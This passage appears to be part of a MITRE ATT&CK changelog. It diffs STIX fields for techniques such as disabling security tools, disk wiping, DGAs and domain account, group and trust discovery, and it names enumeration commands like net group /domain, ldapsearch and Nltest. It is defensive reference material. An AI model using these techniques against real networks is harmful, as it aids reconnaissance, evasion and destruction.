MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
| external_references[1]['source_name'] | capec | OutFlank System Calls |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/578.html | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ |
| external_references[2]['source_name'] | OutFlank System Calls | chasing_avaddon_ransomware |
| external_references[2]['description'] | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. | Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022. |
| external_references[2]['url'] | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ | https://www.mandiant.com/resources/chasing-avaddon-ransomware |
| external_references[3]['source_name'] | MDSec System Calls | doppelpaymer_crowdstrike |
| external_references[3]['description'] | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. | Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022. |
| external_references[3]['url'] | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/ |
| x_mitre_data_sources[0] | Process: Process Termination | Windows Registry: Windows Registry Key Deletion |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Driver: Driver Load |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Deletion | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Service: Service Metadata |
| x_mitre_data_sources[4] | Service: Service Metadata | Command: Command Execution |
| x_mitre_data_sources[5] | Sensor Health: Host Status | Process: Process Termination |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'avoslocker_ransomware', 'description': 'Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.', 'url': 'https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html'} | |
| external_references | {'source_name': 'dharma_ransomware', 'description': 'Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.', 'url': 'https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/'} | |
| external_references | {'source_name': 'MDSec System Calls', 'description': 'MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.', 'url': 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/'} | |
| external_references | {'source_name': 'SCADAfence_ransomware', 'description': 'Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.', 'url': 'https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf'} | |
| external_references | {'source_name': 'demystifying_ryuk', 'description': 'Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/578.html', 'external_id': 'CAPEC-578'} | |
| x_mitre_contributors | Daniel Feichter, @VirtualAllocEx, Infosec Tirol | |
| x_mitre_contributors | Lucas Heiligenstein | |
| x_mitre_contributors | Cian Heasley | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_contributors | Sarathkumar Rajendran, Microsoft Defender365 | |
| x_mitre_data_sources | Sensor Health: Host Status |
| Description |
|---|
| Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'root', 'Administrator', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 22:53:20.162000+00:00 | 2022-07-28 18:55:35.989000+00:00 |
| external_references[1]['source_name'] | Novetta Blockbuster | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| external_references[3]['source_name'] | DOJ Lazarus Sony 2018 | Novetta Blockbuster |
| external_references[3]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[3]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | Driver: Driver Load |
| x_mitre_data_sources[1] | Command: Command Execution | Drive: Drive Modification |
| x_mitre_data_sources[2] | Driver: Driver Load | Drive: Drive Access |
| x_mitre_data_sources[3] | Drive: Drive Access | Process: Process Creation |
| x_mitre_data_sources[4] | Drive: Drive Modification | Command: Command Execution |
| Description |
|---|
| Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'root', 'SYSTEM', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 23:00:00.599000+00:00 | 2022-07-28 18:55:35.987000+00:00 |
| external_references[1]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | Drive: Drive Access |
| x_mitre_data_sources[2] | Driver: Driver Load | Process: Process Creation |
| x_mitre_data_sources[3] | Drive: Drive Access | Driver: Driver Load |
| Description |
|---|
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['ExtraHop', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 14:05:14.784000+00:00 | 2022-08-25 13:04:00.863000+00:00 |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Group: Group Enumeration | |
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | |
| external_references | CAPEC-560 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-560 | |
| external_references | Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 03:29:47.651000+00:00 | 2022-04-19 20:14:34.479000+00:00 |
| description | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. |
| external_references[1]['source_name'] | capec | TechNet Credential Theft |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/560.html | https://technet.microsoft.com/en-us/library/dn535501.aspx |
| external_references[2]['source_name'] | TechNet Credential Theft | TechNet Audit Policy |
| external_references[2]['description'] | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/dn535501.aspx | https://technet.microsoft.com/en-us/library/dn487457.aspx |
| external_references[4]['source_name'] | TechNet Audit Policy | Ubuntu SSSD Docs |
| external_references[4]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://ubuntu.com/server/docs/service-sssd |
| external_references[5]['source_name'] | Ubuntu SSSD Docs | capec |
| external_references[5]['url'] | https://ubuntu.com/server/docs/service-sssd | https://capec.mitre.org/data/definitions/560.html |
| x_mitre_data_sources[1] | User Account: User Account Authentication | Logon Session: Logon Session Creation |
| x_mitre_data_sources[2] | Logon Session: Logon Session Creation | User Account: User Account Authentication |
| Old Description | New Description |
|---|---|
| Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-10 18:28:57.002000+00:00 | 2022-03-11 18:26:23.432000+00:00 |
| description | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| Description |
|---|
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-12 19:07:53.043000+00:00 | 2022-10-21 12:55:51.337000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:30:33.508000+00:00 | 2022-10-21 14:32:05.257000+00:00 |
| description | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). |
| external_references[1]['source_name'] | WHOIS | Circl Passive DNS |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://www.whois.net/ | https://www.circl.lu/services/passive-dns/ |
| external_references[2]['source_name'] | DNS Dumpster | Azure Active Directory Reconnaisance |
| external_references[2]['description'] | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. | Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://dnsdumpster.com/ | https://o365blog.com/post/just-looking/ |
| external_references[3]['source_name'] | Circl Passive DNS | DNS Dumpster |
| external_references[3]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.circl.lu/services/passive-dns/ | https://dnsdumpster.com/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Office 265 Azure Domain Availability', 'description': 'Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.', 'url': 'https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure'} | |
| external_references | {'source_name': 'WHOIS', 'description': 'NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.', 'url': 'https://www.whois.net/'} |
| Description |
|---|
| Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-17 18:26:17.858000+00:00 | 2022-06-16 19:18:22.305000+00:00 |
| external_references[1]['source_name'] | Microsoft Trusts | Microsoft Operation Wilysupply |
| external_references[1]['description'] | Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019. | Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10) | https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/ |
| external_references[3]['source_name'] | Harmj0y Domain Trusts | Microsoft Trusts |
